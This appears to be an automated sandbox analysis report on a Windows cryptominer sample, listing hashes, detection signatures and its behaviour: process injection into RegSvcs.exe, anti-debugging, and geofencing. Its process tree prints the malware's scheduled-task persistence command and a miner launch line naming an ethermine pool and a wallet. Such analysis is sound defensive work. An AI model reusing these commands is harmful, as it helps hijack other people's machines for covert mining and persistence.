Analysis
-
max time kernel
133s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2022 20:24
Static task
static1
Behavioral task
behavioral1
Sample
bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe
Resource
win7-20220812-en
General
-
Target
bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe
-
Size
850KB
-
MD5
617935448c3a5753762ac8c59d002b09
-
SHA1
547c265e6940de4eaa9b756f3eabd44e5945b8aa
-
SHA256
bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8
-
SHA512
88dfba3cc824a0430b14962395d0f5ed93eb559e077d9162b1d4577d1f8a1e2110a9e87b2e5eb928560f4f087964d923644b120c1b384b43f232c2b1ca6245de
-
SSDEEP
6144:5tvrVv35gx/v6TTBgU5dsbopjLn5i2Lm8pbu5n+QKyX37RodENtQsEb8bKQdh/zH:HpvJKOdsKjL33e7RodvB5
Malware Config
Signatures
-
Detectes Phoenix Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/900-148-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/900-149-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix -
Executes dropped EXE 1 IoCs
Processes:
ICELIUF.exepid process 308 ICELIUF.exe -
Processes:
resource yara_rule behavioral2/memory/900-147-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/900-146-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/900-144-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/900-148-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/900-149-0x0000000140000000-0x000000014082B000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ICELIUF.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation ICELIUF.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
RegSvcs.exepid process 900 RegSvcs.exe 900 RegSvcs.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ICELIUF.exedescription pid process target process PID 308 set thread context of 900 308 ICELIUF.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1532 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
ICELIUF.exepid process 308 ICELIUF.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exeICELIUF.exedescription pid process Token: SeDebugPrivilege 3916 bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe Token: SeDebugPrivilege 308 ICELIUF.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.execmd.exeICELIUF.execmd.exedescription pid process target process PID 3916 wrote to memory of 3768 3916 bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe cmd.exe PID 3916 wrote to memory of 3768 3916 bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe cmd.exe PID 3768 wrote to memory of 1532 3768 cmd.exe timeout.exe PID 3768 wrote to memory of 1532 3768 cmd.exe timeout.exe PID 3768 wrote to memory of 308 3768 cmd.exe ICELIUF.exe PID 3768 wrote to memory of 308 3768 cmd.exe ICELIUF.exe PID 308 wrote to memory of 3960 308 ICELIUF.exe cmd.exe PID 308 wrote to memory of 3960 308 ICELIUF.exe cmd.exe PID 3960 wrote to memory of 4320 3960 cmd.exe schtasks.exe PID 3960 wrote to memory of 4320 3960 cmd.exe schtasks.exe PID 308 wrote to memory of 900 308 ICELIUF.exe RegSvcs.exe PID 308 wrote to memory of 900 308 ICELIUF.exe RegSvcs.exe PID 308 wrote to memory of 900 308 ICELIUF.exe RegSvcs.exe PID 308 wrote to memory of 900 308 ICELIUF.exe RegSvcs.exe PID 308 wrote to memory of 900 308 ICELIUF.exe RegSvcs.exe PID 308 wrote to memory of 900 308 ICELIUF.exe RegSvcs.exe PID 308 wrote to memory of 900 308 ICELIUF.exe RegSvcs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe"C:\Users\Admin\AppData\Local\Temp\bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp649B.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\ProgramData\System0\ICELIUF.exe"C:\ProgramData\System0\ICELIUF.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ICELIUF" /tr "C:\ProgramData\System0\ICELIUF.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xaC24bB4F74b2c83F3ACa168B71B5f45764a95e91.Rig001 -coin etc -log 04⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ICELIUF" /tr "C:\ProgramData\System0\ICELIUF.exe"1⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\System0\ICELIUF.exeFilesize
850KB
MD5617935448c3a5753762ac8c59d002b09
SHA1547c265e6940de4eaa9b756f3eabd44e5945b8aa
SHA256bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8
SHA51288dfba3cc824a0430b14962395d0f5ed93eb559e077d9162b1d4577d1f8a1e2110a9e87b2e5eb928560f4f087964d923644b120c1b384b43f232c2b1ca6245de
-
C:\ProgramData\System0\ICELIUF.exeFilesize
850KB
MD5617935448c3a5753762ac8c59d002b09
SHA1547c265e6940de4eaa9b756f3eabd44e5945b8aa
SHA256bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8
SHA51288dfba3cc824a0430b14962395d0f5ed93eb559e077d9162b1d4577d1f8a1e2110a9e87b2e5eb928560f4f087964d923644b120c1b384b43f232c2b1ca6245de
-
C:\Users\Admin\AppData\Local\Temp\tmp649B.tmp.batFilesize
143B
MD57a401caf7b67769ec2f24e7ec9864a13
SHA1db535484b970a2eee23b86c8b082edb794adf90b
SHA256f48d93d97357c0e888c37efafeed1e3ded3b6aa55fecc1e96760598ca3fbbd96
SHA512ed58cb4c599716aaa4140f03f9725ce4e605d3fe1c5d90679489883a8e45d85f81acbefe9583c06bfe9f5ff4478783311b0675fb6951cf51af2fc384347a9bfe
-
memory/308-150-0x00007FFD78330000-0x00007FFD78DF1000-memory.dmpFilesize
10.8MB
-
memory/308-141-0x00007FFD78330000-0x00007FFD78DF1000-memory.dmpFilesize
10.8MB
-
memory/308-138-0x0000000000000000-mapping.dmp
-
memory/900-145-0x0000000140829C40-mapping.dmp
-
memory/900-147-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/900-146-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/900-144-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/900-148-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/900-149-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/1532-136-0x0000000000000000-mapping.dmp
-
memory/3768-134-0x0000000000000000-mapping.dmp
-
memory/3916-133-0x00007FFD784B0000-0x00007FFD78F71000-memory.dmpFilesize
10.8MB
-
memory/3916-137-0x00007FFD784B0000-0x00007FFD78F71000-memory.dmpFilesize
10.8MB
-
memory/3916-132-0x0000000000E90000-0x0000000000F68000-memory.dmpFilesize
864KB
-
memory/3960-142-0x0000000000000000-mapping.dmp
-
memory/4320-143-0x0000000000000000-mapping.dmp